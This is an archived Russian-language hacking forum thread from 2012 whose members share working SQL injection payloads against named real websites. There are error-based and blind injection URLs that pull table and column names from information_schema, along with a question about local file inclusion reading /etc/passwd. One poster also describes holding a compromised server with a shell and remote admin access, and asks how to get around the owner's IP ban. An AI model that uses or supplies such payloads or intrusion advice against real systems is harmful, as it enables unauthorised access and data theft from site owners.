ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
01.04.2012, 20:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
I am not getting something here.
Код:
Code:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1+order+by+100+--+
Nothing works, maybe there is no cheekbones. |
|
|
|
01.04.2012, 20:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от lightangel
lightangel said:
I am not getting something here.
Код:
Code:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1+order+by+100+--+
Nothing works, maybe there is no cheekbones.
Код:
Code:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1')+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+j
Код:
Code:
Error 1062: Duplicate entry 'COLLATIONS1' for key 1
|
|
|
|
01.04.2012, 21:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
2160
Репутация:
0
|
|
http://lineoutdoor.ru/portfolio/list/type/-2'
Определил имя базы b50893
блинд. подобрал таблицу portfolio так:
http://lineoutdoor.ru/portfolio/list/type/-2'+or+1=(substring((select+table_name+from+informa tion_schema.tables+where+table_schema=char(98,53,4 8,56,57,51)+limit+0,1),A,1)=char(X))+--+s
Перебирая номер буквы A и аски код X
Пытаюсь получить имена столбцов, но никак не выходит. Как быть дальше?
|
|
|
|
01.04.2012, 21:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
17281
Репутация:
-4
|
|
Что делать если при обращении к proc/self/environ вылетает ошибка, что файл не найден, а при обращении к etc/passwd выводится файл?
Кстати, путь имеет такой вид:
/www/apache/domains
Тут можно где-то найти логи?
|
|
|
|
01.04.2012, 21:45
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от kise
kise said:
Что делать если при обращении к proc/self/environ вылетает ошибка, что файл не найден, а при обращении к etc/passwd выводится файл?
читать статьи =\
возможно прав не хватает, возможно это не Linux,а что то из семейства bsd, и еще куча чего
дальше буду стереть подобные посты
|
|
|
01.04.2012, 21:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
17281
Репутация:
-4
|
|
vlad-i-mir, а там случаем не error based?
|
|
|
|
01.04.2012, 21:53
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от vlad-i-mir
vlad-i-mir said:
http://lineoutdoor.ru/portfolio/list/type/-2'
Определил имя базы b50893
блинд. подобрал таблицу portfolio так:
http://lineoutdoor.ru/portfolio/list/type/-2'+or+1=(substring((select+table_name+from+informa tion_schema.tables+where+table_schema=char(98,53,4 8,56,57,51)+limit+0,1),A,1)=char(X))+--+s
Перебирая номер буквы A и аски код X
Пытаюсь получить имена столбцов, но никак не выходит. Как быть дальше?
Error-based :
http://lineoutdoor.ru/portfolio/list/type/1112'+or+1+group+by+concat(%20(select+column_name+ from+information_schema.columns+where+table_name+l ike+'Portfolio'+limit+0,1),floor(rand(0)*2))%20hav ing%20min(0)--+
|
|
|
|
02.04.2012, 16:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
39063
Репутация:
0
|
|
Вопрос мой конечно не по уязвимостям, но писать больше некуда.
Значится, поимел я сайт, радмин, дедик, шелл - все как полагается.
Злой админ конешн со мной изрядно боролся, но ничего у него не выходило(ламер редкостный ) Вы спросите почему я не захватил полностью дедик и не удалил всех к чертям? Да просто мне это не нужно совсем, пусть живут. Я так думал, пока я сегодня получил от хрома отказ зайти на сайт. Захожу на дедик - также. Чекаю через прокси - все работает. Ясен пень что меня забанили, да еще как искусно! По подсети!
Работать под своим реальным ip не очень то и хочется(носки использую). Носки добывать новые тоже не очень вариант. Подскажите как мне быстренько восстановить доступ. От чего это зависит от сервера или от конфига на сайте? Если на сервере то что и где там прописано, чтобы я не заходил? Сервер Windows NT, через прокси могу заходить на шелл, ну и сразу на комп соответсвенно.
|
|
|
|
02.04.2012, 21:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
На сайтe через .htaccess. А насчет деда, думаю маршуритизатор..
|
|
|
|
03.04.2012, 23:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
13805
Репутация:
0
|
|
А можно ли каким нибуь образом,узнать chmod на дирректорию?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид